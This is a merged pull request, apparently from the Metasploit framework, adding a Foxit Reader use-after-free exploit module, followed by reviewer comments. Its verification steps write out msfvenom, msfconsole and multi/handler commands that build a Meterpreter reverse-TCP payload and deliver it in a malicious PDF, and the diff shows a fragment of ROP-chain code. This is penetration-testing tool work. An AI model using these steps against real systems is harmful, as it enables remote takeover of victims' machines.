### PR TITLE
Add Foxit Reader UAF Module and Docs

### PR DESCRIPTION
**Pull request by jrobles-r7**
Add module and documentation for Foxit Reader uninitialized memory and uaf code execution vulnerabilities.

## Verification

- [x] `./msfvenom -p windows/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> --arch x86 -f exe -o /share/path/tmp.exe`
- [x] `chmod 777 /share/path/tmp.exe`
- [x] `./msfconsole -qx 'use exploit/windows/fileformat/foxit_reader_uaf ; set exename tmp.exe ; set share <share> ; set lhost <lhost> ; run'`
- [x] `use multi/handler`
- [x] `set payload windows/meterpreter/reverse_tcp`
- [x] `set lhost <lhost>`
- [x] `run -j`
- [x] Copy pdf over to target. Start Foxit Reader then open pdf from Foxit's Menu.

### CODE REVIEW

File: modules/exploits/windows/fileformat/foxit_reader_uaf.rb [hunk 1]
```diff
@@ -0,0 +1,218 @@
...
+    max_index = 0
+    share_path.unpack('V*').each_with_index {|blk, index|
+      rop << "\nrop[0x%02x] = 0x%08x" % [index+12, blk]
+      max_index = index
+    }
+
+    (max_index+1).upto(10) {|i| rop << "\nrop[0x%02x] = 0x00000000" % (i+12)}
+
+    <<~PDFDOC
+%PDF
```
Comment (acammack-r7) [inline modules/exploits/windows/fileformat/foxit_reader_uaf.rb]: Should this be a `.erb` file in `data/exploits`?

**Comment by wchen-r7** [comment]
Nice job on the module @jrobles-r7! I think there is room for improvement, for example I was thinking using `include Msf::Exploit::Remote::SMB::Server::Share` to host the payload, and maybe take advantage of ERB. But it's all good, I think this PR is landable. This actually gives me an excellent opportunity to let Shelby try the SMB mixin and ERB, which I think can be in a separate PR from her. I can go ahead and land this. Thank you all.

**Comment by wchen-r7** [comment]
# Release Notes

Add module and documentation for Foxit Reader uninitialized memory and uaf code execution vulnerabilities.

**Comment by stevenseeley** [comment]
Nice work! Just a small note, I changed the link to the stand alone poc to: https://srcincite.io/pocs/cve-2018-99{48,58}.pdf.txt

**Comment by jrobles-r7** [comment]
Thanks for pointing that out @stevenseeley 
Updating the link #10523

**Pull request merged**